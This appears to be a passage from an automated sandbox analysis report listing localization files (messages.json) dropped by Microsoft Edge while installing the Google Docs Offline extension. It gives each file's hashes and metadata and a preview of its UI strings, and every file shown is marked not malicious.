                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                          MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                          SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                          SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                          SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                          MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                          SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                          SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                          SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                          MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                          SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                          SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                          SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
